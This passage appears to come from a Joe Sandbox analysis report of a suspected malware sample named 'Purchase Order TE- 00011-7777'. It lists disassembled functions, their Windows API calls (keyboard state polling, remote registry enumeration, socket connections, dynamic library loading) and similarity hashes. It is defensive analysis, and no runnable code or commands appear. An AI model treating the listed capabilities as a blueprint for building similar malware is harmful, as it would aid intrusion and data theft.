                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AF18E4
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AF1917
                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AF1A3A
                      • CloseHandle.KERNEL32(?), ref: 00AF1AB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                      • String ID:
                      • API String ID: 2364364464-0
                      • Opcode ID: 773b8a28c4394ccd2edbcaf3c27221dfe4579201db678239dded3d9df3c67cc5
                      • Instruction ID: d78ebad5883591a2f69f5fd4f9404d53c3cea250ed1693ce7ca24132fb405baa
                      • Opcode Fuzzy Hash: 773b8a28c4394ccd2edbcaf3c27221dfe4579201db678239dded3d9df3c67cc5
                      • Instruction Fuzzy Hash: 0F817174A40205EBDF10EF64C986BAD7BF5AF49760F148459F905AF3C2D7B8E9408B90
                      Function 00AF0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00AF05DF
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00AF066E
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AF068C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00AF06D2
                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 00AF06EC
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                      • String ID:
                      • API String ID: 327935632-0
                      • Opcode ID: c440371d41d6708235dcac90f28e7f5ab3c9c688896c7b1f925e6641bf1635b1
                      • Instruction ID: 9bb7148faf560aae4ca760f10a129099906dc71bad27666b16a5a8145ae1aff0
                      • Opcode Fuzzy Hash: c440371d41d6708235dcac90f28e7f5ab3c9c688896c7b1f925e6641bf1635b1
                      • Instruction Fuzzy Hash: 49513575A006099FCF00EFA8CA91EADF7F5AF58310B1480A5FA15AB352DB70AD55CB90
                      Function 00AF2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2DE0
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2E1F
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AF2E66
                      • RegCloseKey.ADVAPI32(?,?), ref: 00AF2E92
                      • RegCloseKey.ADVAPI32(00000000), ref: 00AF2E9F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                      • String ID:
                      • API String ID: 3440857362-0
                      • Opcode ID: 87e7686672932fc9f6ab39d53c4e071f55f55d6567efb029b11de5a9e277060f
                      • Instruction ID: 944472f0f2ac4ea5844dbf3a43a8b1e341196501273be794c2228f412924721d
                      • Opcode Fuzzy Hash: 87e7686672932fc9f6ab39d53c4e071f55f55d6567efb029b11de5a9e277060f
                      • Instruction Fuzzy Hash: 93515C71204209AFDB05EFA4C991F6BB7E9FF88314F14481EF6958B2A1DB31E905CB52
                      Function 00AFCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 408a4430baba6bf87dcd3e764010952a79212a0fbe3d429366657e3fa364045e
                      • Instruction ID: 43f24b38afcab436310d3d00463680a4c791cf41982dc2f35e2324ace1b40375
                      • Opcode Fuzzy Hash: 408a4430baba6bf87dcd3e764010952a79212a0fbe3d429366657e3fa364045e
                      • Instruction Fuzzy Hash: 6341D23990020DBBD720DBA9CE49FF9BBB9EB09330F154265FA19A72D1C7709D01D650
                      Function 00AE1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                      Download Yara Rule
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AE17D4
                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AE17FD
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AE183C
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AE1861
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AE1869
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                      • String ID:
                      • API String ID: 1389676194-0
                      • Opcode ID: ca8078d149e0d323c9a3aba6b2dd4293cb2e5d5f69db26977629b18d926187e0
                      • Instruction ID: 443dac4123efd31c8f7f7c2913f755133fc330d45e66e1bcf213cdade32c2a02
                      • Opcode Fuzzy Hash: ca8078d149e0d323c9a3aba6b2dd4293cb2e5d5f69db26977629b18d926187e0
                      • Instruction Fuzzy Hash: 7941F835A00215DFCF11EF65CA81AADBBF5EF49310B148099E806AB361DB35ED51DFA0
                      Function 00AAB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(000000FF), ref: 00AAB749
                      • ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                      • GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                      • GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      • Opcode ID: 6a8ef2b80d81ce0279cb39571020e761a494c3567572d7587068071e274fdc69
                      • Instruction ID: 45e7473df15449f2da8b71b90aa570f9719de90d557bec96913c791a10ea8baa
                      • Opcode Fuzzy Hash: 6a8ef2b80d81ce0279cb39571020e761a494c3567572d7587068071e274fdc69
                      • Instruction Fuzzy Hash: E1415E35505119FFDF159F64C884AEABBB4FB46360F10425AF829932D1CB74AD90DFA0
                      Function 00ACC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00ACC156
                      • PostMessageW.USER32(?,00000201,00000001), ref: 00ACC200
                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ACC208
                      • PostMessageW.USER32(?,00000202,00000000), ref: 00ACC216
                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ACC21E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      • Opcode ID: 937c3834dff686d56dbc03cfa11a58a4b2848f47d57ffe9678120b95b40497dc
                      • Instruction ID: 806855554ea59d892c0ce06efa2e3652ede63c77901c6b4fa493a17267d12adb
                      • Opcode Fuzzy Hash: 937c3834dff686d56dbc03cfa11a58a4b2848f47d57ffe9678120b95b40497dc
                      • Instruction Fuzzy Hash: 5031CE71500219EBDB04CFA8DE4CBDE3BB5EB04325F118228F928AB1D1C7B09A14CB90
                      Function 00ACE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                      Download Yara Rule
                      APIs
                      • IsWindowVisible.USER32(?), ref: 00ACE9CD
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ACE9EA
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ACEA22
                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ACEA48
                      • _wcsstr.LIBCMT ref: 00ACEA52
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                      • String ID:
                      • API String ID: 3902887630-0
                      • Opcode ID: 6c57382242f9aa228eb828c09eedff29f3670726e4c289b4ce9cb8e812445b95
                      • Instruction ID: db8a21f390a13c68a0d04ab6db08e0512e0b06b1d4441369062e535f075b2532
                      • Opcode Fuzzy Hash: 6c57382242f9aa228eb828c09eedff29f3670726e4c289b4ce9cb8e812445b95
                      • Instruction Fuzzy Hash: 8F21D772204240BEEB15DB699D45FBBBBACEF45750F11812DF809CB092DE71DC409250
                      Function 00AFDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFDCC0
                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AFDCE4
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AFDCFC
                      • GetSystemMetrics.USER32(00000004), ref: 00AFDD24
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00AE407D,00000000), ref: 00AFDD42
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Long$MetricsSystem
                      • String ID:
                      • API String ID: 2294984445-0
                      • Opcode ID: 0721df8b27a2eaaabd523adce03b032940857b2c28c16d8e02103fb60349bd66
                      • Instruction ID: 3d426e76ab2c2c1e8fb510395c468af2bc21715124ce90ff2df91a1ed2b48dad
                      • Opcode Fuzzy Hash: 0721df8b27a2eaaabd523adce03b032940857b2c28c16d8e02103fb60349bd66
                      • Instruction Fuzzy Hash: 8A21B371605219AFCB325FB99C48B793BA6FB46365F104B34FA26C72E0D7719811CB90
                      Function 00ACCA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ACCA86
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAB8
                      • __itow.LIBCMT ref: 00ACCAD0
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAF6
                      • __itow.LIBCMT ref: 00ACCB07
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$__itow$_memmove
                      • String ID:
                      • API String ID: 2983881199-0
                      • Opcode ID: 3e4fae43646a397c603289f541373f9d2cc7ca72243ad91b4d31ad5c5aa68e70
                      • Instruction ID: 8d4952f4e183c474f0a40c4c36dc122f3eaed9831522c296fc6dd4194e04d1d3
                      • Opcode Fuzzy Hash: 3e4fae43646a397c603289f541373f9d2cc7ca72243ad91b4d31ad5c5aa68e70
                      • Instruction Fuzzy Hash: 6521D876B002047BDF21EBA89D4BFDE7AA9EF49760F114029F909E7192DA70CD4587A0
                      Function 00AD6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                      • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                      • GetLastError.KERNEL32 ref: 00AD6DC5
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                      • _wcsrchr.LIBCMT ref: 00AD6DFB
                        • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6E31
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                      • String ID:
                      • API String ID: 3633006590-0
                      • Opcode ID: bc62b0e3ea5f74e33db9c2819311d43c7e9d5b05081a4411a830d85d6db8312d
                      • Instruction ID: 05d2b7f848171ea52005fdeee00729656664aa689b5bc6dfea293196898d9367
                      • Opcode Fuzzy Hash: bc62b0e3ea5f74e33db9c2819311d43c7e9d5b05081a4411a830d85d6db8312d
                      • Instruction Fuzzy Hash: BC2136756003189ADF20BBB8FD4AAEA33ACCF01310F600657E062C32D3EF20DE848A50
                      Function 00AE9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AEACD3: inet_addr.WSOCK32(00000000), ref: 00AEACF5
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00AE9160
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE916F
                      • connect.WSOCK32(00000000,?,00000010), ref: 00AE918B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLastconnectinet_addrsocket
                      • String ID:
                      • API String ID: 3701255441-0
                      • Opcode ID: bc13f0fb42a3ea18a583339ac7d8c54c73ef72c262caa6b41aae13440943186f
                      • Instruction ID: fd92ef4608e0e86487e1346cdbbeda68e9af25ef30945ba8d1acc1e9cef51aab
                      • Opcode Fuzzy Hash: bc13f0fb42a3ea18a583339ac7d8c54c73ef72c262caa6b41aae13440943186f
                      • Instruction Fuzzy Hash: 32219D313006119FDB00AF68CD89BAE77E9EF89724F048559F916AB3D2DB74EC418B51
                      Function 00AE89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                      • IsWindow.USER32(00000000), ref: 00AE89CE
                      • GetForegroundWindow.USER32 ref: 00AE89E5
                      • GetDC.USER32(00000000), ref: 00AE8A21
                      • GetPixel.GDI32(00000000,?,00000003), ref: 00AE8A2D
                      • ReleaseDC.USER32(00000000,00000003), ref: 00AE8A68
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ForegroundPixelRelease
                      • String ID:
                      • API String ID: 4156661090-0
                      • Opcode ID: 8ac6d9330f891fd1e14b1533045426f63a3154b39a202ed23561e6fde77104f4
                      • Instruction ID: 855c8586ec069eec5011e3e1e49097ea06206c75c62600f3c09b6e382fc50390
                      • Opcode Fuzzy Hash: 8ac6d9330f891fd1e14b1533045426f63a3154b39a202ed23561e6fde77104f4
                      • Instruction Fuzzy Hash: BA219375A00200AFDB10EFA5CD85AAA7BF5EF48301F05C479E94A97352CF74AD00CB60
                      Function 00AAB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                      • SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                      • BeginPath.GDI32(?), ref: 00AAB611
                      • SelectObject.GDI32(?,00000000), ref: 00AAB63B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: 15ca953ab62a30e89c8e962124adbf0af3c0e007e2e64ce65b024370c078fbd9
                      • Instruction ID: 37035f886120e5db932406d4d8b3f2c2498c3a506e2b4e9dc2615896068ec63d
                      • Opcode Fuzzy Hash: 15ca953ab62a30e89c8e962124adbf0af3c0e007e2e64ce65b024370c078fbd9
                      • Instruction Fuzzy Hash: 5221AE70810305EFDB209F19ED487A97BF8FB0232AF544AAAF411A71E1DB709891CB70
                      Function 00AB2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                      Download Yara Rule
                      APIs
                      • __calloc_crt.LIBCMT ref: 00AB2E81
                      • CreateThread.KERNEL32(?,?,00AB2FB7,00000000,?,?), ref: 00AB2EC5
                      • GetLastError.KERNEL32 ref: 00AB2ECF
                      • _free.LIBCMT ref: 00AB2ED8
                      • __dosmaperr.LIBCMT ref: 00AB2EE3
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                      • String ID:
                      • API String ID: 2664167353-0
                      • Opcode ID: f756644641b8b51d775a0579f4631df25bad0e7538772a31b8a0e4bb6345c6c8
                      • Instruction ID: e26be04623d70c64b4b069a581342a99b0592c9085ea2fca30b6748ad669d3ab
                      • Opcode Fuzzy Hash: f756644641b8b51d775a0579f4631df25bad0e7538772a31b8a0e4bb6345c6c8
                      • Instruction Fuzzy Hash: F811A5321047056F9710BFAA9D41EEB7BACEF45760B10052AF91486153DF75C8108760
                      Function 00ACB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                      • GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                      • GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                      • HeapAlloc.KERNEL32(00000000,?,00ACB3CB,?,?,?), ref: 00ACB923
                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
